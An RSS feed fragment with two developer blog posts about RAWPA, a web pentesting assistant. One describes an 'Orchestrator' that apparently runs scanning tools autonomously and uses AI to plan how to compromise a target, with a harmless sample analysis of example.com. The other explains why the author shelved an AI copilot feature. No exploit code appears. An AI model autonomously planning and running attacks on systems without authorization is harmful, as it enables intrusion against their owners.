&lt;strong&gt;AI-Driven Strategy:&lt;/strong&gt; This is the game-changer. After running its toolchain, the Orchestrator feeds the findings into its neural network. It cross-references the output with known CVEs, public writeups, and learned attack patterns to build the most effective initial approach to compromise the target. It doesn’t just give you data; it gives you a strategy.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foy78se3pqcr8am580j0t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foy78se3pqcr8am580j0t.png" alt="Tools in Orchestrator" width="440" height="681"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  The Current State: It Works… On My Machine
&lt;/h3&gt;

&lt;p&gt;Now, for the classic developer reality check. The Pentest Orchestrator is fully functional and works flawlessly on my local development server. The AI generates its plan, executes the toolchain, analyzes the results, and presents a strategic pathway.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;Output:

Starting multi-page scrape of: https://example.com

Scraping: https://example.com

Found 0 internal links

&lt;span class="o"&gt;================================================================================&lt;/span&gt;

MULTI-PAGE ANALYSIS RESULTS FOR: https://example.com

Pages scraped: 1

&lt;span class="o"&gt;================================================================================&lt;/span&gt;

Based on the analysis of the provided HTML content from the single scraped page &lt;span class="o"&gt;(&lt;/span&gt;https://example.com&lt;span class="o"&gt;)&lt;/span&gt;, here is a comprehensive report:
&lt;span class="nt"&gt;---&lt;/span&gt;
Comprehensive Web Scraping &amp;amp; Security Analysis
&lt;span class="o"&gt;==&lt;/span&gt;
1. COMPANY/SITE DESCRIPTION

&lt;span class="nt"&gt;--&lt;/span&gt;
This website does not represent a commercial company or provide any direct service or product. The content explicitly states its purpose:

�   Primary Purpose: The site is an &lt;span class="s2"&gt;"Example Domain"&lt;/span&gt; intended &lt;span class="s2"&gt;"for use in illustrative examples in documents."&lt;/span&gt;

�   Usage Guidance: It explicitly permits &lt;span class="nb"&gt;users &lt;/span&gt;to &lt;span class="s2"&gt;"use this domain in literature without prior coordination or asking for permission."&lt;/span&gt;

�   Information Source: It provides a &lt;span class="nb"&gt;link &lt;/span&gt;to https://www.iana.org/domains/example &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="s2"&gt;"More information..."&lt;/span&gt; which points to the Internet Assigned Numbers Authority &lt;span class="o"&gt;(&lt;/span&gt;IANA&lt;span class="o"&gt;)&lt;/span&gt;, confirming its role as a reserved domain &lt;span class="k"&gt;for &lt;/span&gt;examples.

Conclusion: This domain serves purely as a placeholder or an informational page &lt;span class="k"&gt;for &lt;/span&gt;educational and documentation purposes, as defined by IANA. It is not an active business or service provider.

2. TECHNOLOGY STACK

&lt;span class="nt"&gt;--&lt;/span&gt;
The technology stack &lt;span class="k"&gt;for &lt;/span&gt;this page is extremely minimal and client-side focused:

�   Core Technologies:

    &lt;span class="k"&gt;*&lt;/span&gt;   HTML5: Indicated by &amp;lt;&lt;span class="o"&gt;!&lt;/span&gt;doctype html&amp;gt;.

    &lt;span class="k"&gt;*&lt;/span&gt;   CSS3: Used &lt;span class="k"&gt;for &lt;/span&gt;styling, all implemented via an inline &amp;lt;style&amp;gt; block within the &amp;lt;&lt;span class="nb"&gt;head&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; section.

�   Frameworks/Libraries: No discernible front-end frameworks &lt;span class="o"&gt;(&lt;/span&gt;e.g., React, Angular, Vue, jQuery&lt;span class="o"&gt;)&lt;/span&gt; or CSS frameworks &lt;span class="o"&gt;(&lt;/span&gt;e.g., Bootstrap, Tailwind CSS&lt;span class="o"&gt;)&lt;/span&gt; are detected.

�   Backend Technologies: No server-side technology can be inferred from the provided client-side HTML. It appears to be a static page.

�   Specific Libraries/Tools: None detected.

�   Possible Security or Business Flaws Visible &lt;span class="k"&gt;in &lt;/span&gt;the Code:

    &lt;span class="k"&gt;*&lt;/span&gt;   Inline CSS: While not a security flaw, embedding all CSS inline &lt;span class="k"&gt;in &lt;/span&gt;the HTML &lt;span class="o"&gt;(&lt;/span&gt;as seen with the &amp;lt;style&amp;gt; tag&lt;span class="o"&gt;)&lt;/span&gt; is generally poor practice &lt;span class="k"&gt;for &lt;/span&gt;larger, multi-page websites as it prevents browser caching of stylesheets and increases HTML file size. For a single, static example page, its impact is negligible.

    &lt;span class="k"&gt;*&lt;/span&gt;   Given the page&lt;span class="s1"&gt;'s static and illustrative nature, there are no obvious functional or business logic flaws visible from the client-side code.


3. SECURITY ANALYSIS &amp;amp; SENSITIVE DATA

--
The security posture of this specific page is very strong due to its minimalist and static nature.

�   Security-Relevant Details:

    *   No Forms or Authentication Mechanisms: The page contains no input fields, login forms, registration forms, or any other interactive elements that would typically handle user data or authentication.

    *   No API Endpoints: No fetch calls, XMLHttpRequest, or other JavaScript code that would interact with backend APIs are present.

    *   Meta Tags: Standard charset="utf-8", Content-type="text/html; charset=utf-8", and viewport meta tags are used.

    *   External Links: Only one external link is present, pointing to the official IANA website (https://www.iana.org/domains/example).

�   Potential Vulnerabilities or Misconfigurations:

    *   Client-Side Vulnerabilities: Due to the absence of JavaScript, user input fields, and dynamic content, common client-side vulnerabilities like Cross-Site Scripting (XSS) are highly unlikely to originate from this page'&lt;/span&gt;s content itself.

    &lt;span class="k"&gt;*&lt;/span&gt;   Server-Side Vulnerabilities: Cannot be assessed from the provided HTML. However, as it appears to be a static page, the attack surface &lt;span class="k"&gt;for &lt;/span&gt;server-side vulnerabilities &lt;span class="o"&gt;(&lt;/span&gt;e.g., SQL Injection, RCE&lt;span class="o"&gt;)&lt;/span&gt; originating from web application logic is minimal.

    &lt;span class="k"&gt;*&lt;/span&gt;   Misconfigurations: No obvious misconfigurations are visible &lt;span class="k"&gt;in &lt;/span&gt;the HTML.

�   CRITICAL: Analysis of Hardcoded API Keys, Tokens, or Credentials:

    &lt;span class="k"&gt;*&lt;/span&gt;   NONE FOUND. There are absolutely no hardcoded API keys, authentication tokens, usernames, passwords, email addresses, or any other credentials or sensitive strings present within the provided HTML content.

�   Assessment of Security Implications of Exposed Sensitive Data:

    &lt;span class="k"&gt;*&lt;/span&gt;   None. Since no sensitive data, credentials, or personally identifiable information &lt;span class="o"&gt;(&lt;/span&gt;PII&lt;span class="o"&gt;)&lt;/span&gt; was found exposed within the HTML, there are no security implications stemming from sensitive data exposure on this page.


4. SITE STRUCTURE

&lt;span class="nt"&gt;--&lt;/span&gt;
�   Types of Pages Found: Only one page &lt;span class="o"&gt;(&lt;/span&gt;main_page&lt;span class="o"&gt;)&lt;/span&gt; was provided, which is a static informational page.

�   Content of Pages: The page contains a main heading, two paragraphs explaining its purpose as an example domain, and a single external &lt;span class="nb"&gt;link &lt;/span&gt;to the IANA website &lt;span class="k"&gt;for &lt;/span&gt;more information.

�   How the Site is Organized: Based on the single page, the site organization is extremely simplistic, effectively a single, standalone static HTML file. There are no navigation menus, sitemaps, or complex inter-page relationships evident.


5. SENSITIVE DATA ASSESSMENT

&lt;span class="nt"&gt;--&lt;/span&gt;
�   Severity of any Exposed Credentials: N/A &lt;span class="o"&gt;(&lt;/span&gt;Not Applicable&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt; No credentials or sensitive API keys were found exposed within the HTML content.

�   Identify Potential Attack Vectors from Exposed Data: N/A. As no sensitive data was exposed, there are no attack vectors specifically related to exposed data from this page&lt;span class="s1"&gt;'s content.

�   Recommend Security Improvements:

    *   For this specific page and its stated purpose, no critical security improvements related to sensitive data exposure are necessary, as it presents no such data.

    *   General Best Practices (if this were a larger, dynamic website):

        *   Separate CSS: For scalability and maintainability, move inline CSS into external .css files.

        *   Content Security Policy (CSP): Implement a robust CSP header to mitigate potential injection attacks (though less relevant for a static page without scripts).

        *   HTTPS Enforcement: While the URL shows https, ensuring strict HTTPS enforcement (e.g., HTTP Strict Transport Security - HSTS) would be crucial for any production site to prevent downgrade attacks.

        *   Server-Side Security: For any actual web application, comprehensive server-side security measures (input validation, secure session management, secure database practices, regular patching) would be paramount.
---
================================================================================
END OF ANALYSIS
================================================================================
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5w5o1a15u2lb15yueeq2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5w5o1a15u2lb15yueeq2.png" alt="Scraping and Analysis tool" width="437" height="516"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The big hurdle right now is infrastructure. RAWPA is currently hosted on Vercel, which is fantastic for serverless applications. However, the Orchestrator needs a persistent Node.js/Express server to manage the long-running tool executions and stateful sessions. That means I need to migrate the backend to a cloud service like Digital Ocean or something similar.&lt;/p&gt;

&lt;p&gt;So, while the feature is &lt;em&gt;built&lt;/em&gt;, it’s not yet &lt;em&gt;live&lt;/em&gt;. Once I conquer the infrastructure challenge, the Pentest Orchestrator will be fully available to all RAWPA users.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flk0kzui0fuiorvkoph0c.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flk0kzui0fuiorvkoph0c.png" alt="ASN tool" width="800" height="282"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx0ky0ktiu8gkgy4aewpc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx0ky0ktiu8gkgy4aewpc.png" alt="Google Dorking" width="800" height="276"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  How It Works: A Glimpse Under the Hood
&lt;/h3&gt;

&lt;p&gt;For those who love the technical details, here’s the workflow:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Input:&lt;/strong&gt; You give the Orchestrator a target (like &lt;code&gt;example.com&lt;/code&gt;) and a goal (like "Find vulnerabilities leading to RCE").&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Planning:&lt;/strong&gt; The AI generates a dynamic, multi-phase plan, starting with reconnaissance and moving through vulnerability assessment.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Execution:&lt;/strong&gt; It autonomously runs tools like &lt;code&gt;subfinder&lt;/code&gt;, &lt;code&gt;httpx&lt;/code&gt;, and &lt;code&gt;nuclei&lt;/code&gt; in sequence. The output of one tool becomes the input for the next.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Analysis &amp;amp; Adaptation:&lt;/strong&gt; Here’s the magic. After each step, the AI analyzes the results. If it finds a login panel, it might dynamically decide to prioritize deeper testing there. If it finds a critical CVE, it adjusts its strategy to focus on that vector.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Reporting:&lt;/strong&gt; Finally, it compiles the findings, vulnerabilities, and evidence into a comprehensive report.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This new feature represents the next evolution of RAWPA—moving from a knowledgeable assistant to an active, intelligent partner in your security assessments.&lt;/p&gt;

&lt;p&gt;As always, RAWPA is built for and by the community. If you have ideas, methodologies, or want to contribute, hit up the "Contribute" feature on the &lt;a href="https://www.rawpa.vercel.app" rel="noopener noreferrer"&gt;RAWPA site&lt;/a&gt; or connect with me on &lt;a href="https://www.linkedin.com/in/glenn-osioh-85104827b/" rel="noopener noreferrer"&gt;LinkedIn&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;The journey continues, and I can't wait to get the Orchestrator into your hands. Stay tuned.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>I'm Building a "Copilot for Hackers", But I'm Forcing it to Be Dumb</title>
      <dc:creator>Glenn Rodney</dc:creator>
      <pubDate>Thu, 19 Jun 2025 15:27:08 +0000</pubDate>
      <link>https://dev.to/rodneys_int/im-building-a-copilot-for-hackers-but-im-forcing-it-to-be-dumb-15n3</link>
      <guid>https://dev.to/rodneys_int/im-building-a-copilot-for-hackers-but-im-forcing-it-to-be-dumb-15n3</guid>
      <description>&lt;p&gt;Hey everyone! 👋&lt;/p&gt;

&lt;p&gt;If you're a developer or a security researcher, you know the feeling. You're hours into a problem, you've run through all your checklists, and you hit a wall. You lean back and have that all-too-familiar thought: &lt;em&gt;"So, what now?"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;For the past few months, I've been building a project called &lt;strong&gt;RAWPA (Rodney the Advanced Web Pentesting Assistant)&lt;/strong&gt; to be the answer to that exact question. But before I show you what it is, I need to tell you what it &lt;em&gt;isn't&lt;/em&gt;.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;I need to state this with utmost importance: &lt;strong&gt;RAWPA is not a "get bugs quick scheme."&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;I strongly encourage the manual process of scouring through JS files, searching for business logic errors, finding exposed endpoints, and getting creative in Burp Suite. RAWPA is not an automation script to replace those skills. It's a companion to provide more ideas when your own list runs out.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  The Shiny AI Feature (And Why I Benched It)
&lt;/h3&gt;

&lt;p&gt;Naturally, I wanted to build a slick, AI-powered assistant. I dove in headfirst, building a RAG (Retrieval-Augmented Generation) model to act as a "Copilot" for each testing step. The initial results were amazing! The AI was parsing commands and providing genuinely helpful guidance. It felt like magic. ✨&lt;/p&gt;

&lt;p&gt;But as I tried to make it more precise, the magic started to fade. The responses got noisy, the code started breaking, and I realized I was spending all my time debugging the AI instead of building the core of the app.&lt;/p&gt;

&lt;p&gt;So I made a tough call: I put the entire feature on hold.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw46hcy478se24v3qh6ks.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw46hcy478se24v3qh6ks.png" alt="RAWPA User Dashboard" width="800" height="431"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I built an admin panel for the project (a huge win in itself!) and added a simple toggle to turn the AI off. It felt like benching my star player, but it was the right strategic move. Perfecting that AI is a whole project on its own, and the core methodologies had to come first.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvxewqt4zc1yjweftedwu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvxewqt4zc1yjweftedwu.png" alt="RAWPA Straightup Methodologies" width="800" height="430"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  So, What Am I Doing Now? The Grind.
&lt;/h3&gt;

&lt;p&gt;Right now, I'm in the deep-dive research phase. This is the less glamorous part of development that doesn't always make it into blog posts. I'm spending my days (and nights) scouring the web, watching technical talks, and digging through research papers to find, test, and validate every single methodology that goes into RAWPA.&lt;/p&gt;

&lt;p&gt;This process was validated when I stumbled upon lostsec's site, which has a similar purpose. Instead of feeling discouraged, it gave me the will to continue, proving there's a real need for tools that augment, rather than automate, our thinking.&lt;/p&gt;

&lt;p&gt;This project also thrives on community knowledge. A connection from LinkedIn gave me a fantastic list of future feature ideas, like gamification, tool integrations, and collaborative modes, which have really shaped the long-term vision.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff2ejwrt2hdhwnps0gvoc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff2ejwrt2hdhwnps0gvoc.png" alt="RAWPA Straightup Methodologies" width="800" height="431"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  What's Next &amp;amp; How You Can Help
&lt;/h3&gt;

&lt;p&gt;My goal is to make RAWPA a reliable, community-informed resource.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;You can follow the nitty-gritty details of the development journey on my personal blog here: &lt;strong&gt;&lt;a href="https://kuwguap.github.io/posts/series-2-implementing-wpa-in-rawpa-part-1/" rel="noopener noreferrer"&gt;https://kuwguap.github.io/posts/series-2-implementing-wpa-in-rawpa-part-1/&lt;/a&gt;&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;This is a community-driven effort. If you have methodologies, ideas, or suggestions, I would love to hear them. The best way to reach out is on &lt;a href="https://www.linkedin.com/in/glenn-osioh-85104827b/" rel="noopener noreferrer"&gt;&lt;strong&gt;LinkedIn&lt;/strong&gt;&lt;/a&gt;
At the end of the day, I believe RAWPA will help someone get unstuck and learn something new. And for me, that's good enough.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Thanks for reading!&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>devlog</category>
      <category>python</category>
      <category>ai</category>
    </item>
  </channel>
</rss>
